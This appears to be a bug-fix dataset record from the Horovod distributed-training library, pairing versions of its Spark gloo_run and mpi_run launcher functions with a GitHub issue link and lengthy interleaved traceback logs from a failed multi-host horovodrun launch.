req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def gloo_run(settings, nics, driver, env):
"""
Run distributed gloo jobs.
:param settings: Settings for running the distributed jobs.
Note: settings.num_proc and settings.hosts must not be None.
:param nics: Interfaces to use by gloo.
:param driver: The Spark driver service that tasks are connected to.
:param env: Environment dictionary to use for running gloo jobs. Can be None.
"""
if env is None:
env = {}
# we don't want the key to be serialized along with settings from here on
key = settings.key
settings.key = None
# Each thread will use SparkTaskClient to launch the job on each remote host. If an
# error occurs in one thread, entire process will be terminated. Otherwise,
# threads will keep running and ssh session.
iface = list(nics)[0]
server_ip = driver.addresses()[iface][0][0]
command = (
sys.executable,
"-m",
"horovod.spark.task.gloo_exec_fn",
codec.dumps_base64(driver.addresses()),
codec.dumps_base64(settings),
)
exec_command = _exec_command_fn(driver.addresses(), key, settings, env)
launch_gloo(command, exec_command, settings, nics, {}, server_ip)
|
def gloo_run(settings, nics, driver, env):
"""
Run distributed gloo jobs.
:param settings: Settings for running the distributed jobs.
Note: settings.num_proc and settings.hosts must not be None.
:param nics: Interfaces to use by gloo.
:param driver: The Spark driver service that tasks are connected to.
:param env: Environment dictionary to use for running gloo jobs. Can be None.
"""
if env is None:
env = {}
# Each thread will use SparkTaskClient to launch the job on each remote host. If an
# error occurs in one thread, entire process will be terminated. Otherwise,
# threads will keep running and ssh session.
iface = list(nics)[0]
server_ip = driver.addresses()[iface][0][0]
command = (
sys.executable,
"-m",
"horovod.spark.task.gloo_exec_fn",
codec.dumps_base64(driver.addresses()),
codec.dumps_base64(settings),
)
exec_command = _exec_command_fn(driver.addresses(), settings.key, settings, env)
launch_gloo(command, exec_command, settings, nics, {}, server_ip)
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def mpi_run(settings, nics, driver, env, stdout=None, stderr=None):
"""
Runs mpirun.
:param settings: Settings for running MPI.
Note: settings.num_proc and settings.hosts must not be None.
:param nics: Interfaces to include by MPI.
:param driver: The Spark driver service that tasks are connected to.
:param env: Environment dictionary to use for running MPI. Can be None.
:param stdout: Stdout of the mpi process.
Only used when settings.run_func_mode is True.
:param stderr: Stderr of the mpi process.
Only used when settings.run_func_mode is True.
"""
env = (
{} if env is None else copy.copy(env)
) # copy env so we do not leak env modifications
# Pass secret key through the environment variables.
env[secret.HOROVOD_SECRET_KEY] = codec.dumps_base64(settings.key)
# we don't want the key to be serialized along with settings from here on
settings.key = None
rsh_agent = (
sys.executable,
"-m",
"horovod.spark.driver.mpirun_rsh",
codec.dumps_base64(driver.addresses()),
codec.dumps_base64(settings),
)
settings.extra_mpi_args = (
'{extra_mpi_args} -x NCCL_DEBUG=INFO -mca plm_rsh_agent "{rsh_agent}"'.format(
extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
rsh_agent=" ".join(rsh_agent),
)
)
command = (
sys.executable,
"-m",
"horovod.spark.task.mpirun_exec_fn",
codec.dumps_base64(driver.addresses()),
codec.dumps_base64(settings),
)
hr_mpi_run(settings, nics, env, command, stdout=stdout, stderr=stderr)
|
def mpi_run(settings, nics, driver, env, stdout=None, stderr=None):
"""
Runs mpirun.
:param settings: Settings for running MPI.
Note: settings.num_proc and settings.hosts must not be None.
:param nics: Interfaces to include by MPI.
:param driver: The Spark driver service that tasks are connected to.
:param env: Environment dictionary to use for running MPI. Can be None.
:param stdout: Stdout of the mpi process.
Only used when settings.run_func_mode is True.
:param stderr: Stderr of the mpi process.
Only used when settings.run_func_mode is True.
"""
env = (
{} if env is None else copy.copy(env)
) # copy env so we do not leak env modifications
# Pass secret key through the environment variables.
env[secret.HOROVOD_SECRET_KEY] = codec.dumps_base64(settings.key)
rsh_agent = (
sys.executable,
"-m",
"horovod.spark.driver.mpirun_rsh",
codec.dumps_base64(driver.addresses()),
codec.dumps_base64(settings),
)
settings.extra_mpi_args = (
'{extra_mpi_args} -x NCCL_DEBUG=INFO -mca plm_rsh_agent "{rsh_agent}"'.format(
extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
rsh_agent=" ".join(rsh_agent),
)
)
command = (
sys.executable,
"-m",
"horovod.spark.task.mpirun_exec_fn",
codec.dumps_base64(driver.addresses()),
codec.dumps_base64(settings),
)
hr_mpi_run(settings, nics, env, command, stdout=stdout, stderr=stderr)
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
